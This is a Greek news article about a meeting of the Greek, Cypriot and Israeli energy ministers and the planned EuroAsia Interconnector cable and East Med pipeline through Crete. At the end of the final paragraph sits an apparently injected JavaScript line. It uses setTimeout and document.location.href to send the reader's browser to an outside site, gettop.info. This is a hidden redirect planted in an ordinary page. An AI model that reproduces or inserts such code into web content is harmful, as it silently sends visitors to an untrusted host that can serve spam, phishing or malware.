Τριμερής για την ενέργεια ανάμεσα σε Ελλάδα – Κύπρο – Ισραήλ

0
10

 

Σε συνέχεια της συνάντησης των ηγετών των τριών χωρών τον Ιανουάριο στη Λευκωσία γίνεται σήμερα η συνάντηση των υπουργών Ενέργειας Ελλάδας – Κύπρου – Ισραήλ στην Αθήνα, με τη χώρα μας να διεκδικεί ρόλο ενεργειακής γέφυρας μεταξύ των δύο πλευρών.

Στο επίκεντρο των συζητήσεων είναι η προώθηση των ενεργειακών διασυνδέσεων των χωρών της Ανατολικής Μεσογείου με την Ευρωπαϊκή Ένωση.

Στη συνάντηση πρόκειται να συμμετάσχουν ο υπουργός Περιβάλλοντος και Ενέργειας Πάνος Σκουρλέτης, ο Κύπριος υπουργός Ενέργειας Γιώργος Λακκοτρύπης και ο υπουργός Υποδομών, Ενέργειας και Υδάτων του Ισραήλ Yuval Steinitz.

Οι κ.κ. Α. Τσίπρας, Ν. Αναστασιάδης και Μ. Νετανιάχου κατά τη συνάντησή τους στη Λευκωσία, συμφώνησαν να προωθήσουν ενεργειακά δίκτυα με στόχο ενίσχυση της ενεργειακής ασφάλειας των τριών χωρών και της ευρύτερης περιοχής.

Τα σχέδια περιλαμβάνουν μεταξύ άλλων την ηλεκτρική διασύνδεση της Κύπρου με την ΕΕ μέσω Ελλάδας όπως και την κατασκευή υποθαλάσσιου αγωγού φυσικού αερίου από την περιοχή της ΝΑ Μεσογείου προς την Ελλάδα και εν συνεχεία προς την Ιταλία.

Πρόκειται για το καλώδιο EuroAsiaInterconnector και τον αγωγό East Med που έχουν ενταχθεί και στον κατάλογο των έργων κοινού ενδιαφέροντος (Projects of Common Interest, PCI) της Ευρωπαϊκής Επιτροπής.

Και τα δύο έργα σχεδιάζονται με ενδιάμεσο σταθμό την Κρήτη. Ο αγωγός φυσικού αερίου σχεδιάζεται να μεταφέρει έως και 16 δισ. κυβικά μέτρα αερίου ετησίως από τα κοιτάσματα της Ανατολικής Μεσογείου προς την Ιταλία μέσω Ελλάδας.

Η χάραξη περιλαμβάνει 200 χλμ , υποθαλάσσιου αγωγού από την Λεκάνη της Λεβαντίνης μέχρι την Κύπρο, 700 χλμ υποθαλάσσιου αγωγού από την Κύπρο έως την Κρήτη, 400 χλμ . υποθαλάσσιου αγωγού από την Κρήτη μέχρι την Πελοπόννησο και 600 χλμ χερσαίου αγωγού από την Ηπειρωτική Ελλάδα μέχρι το σημείο διασύνδεσης με τον αγωγό Ποσειδών στη Θεσπρωτία.

Αντίστοιχα η ηλεκτρική διασύνδεση Ισραήλ – Κύπρου – Ελλάδας σχεδιάζεται με ενδιάμεσο σταθμό τη θέση Κορακιά στην Κρήτη και από εκεί με υποβρύχιο καλώδιο προς την Αττική. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here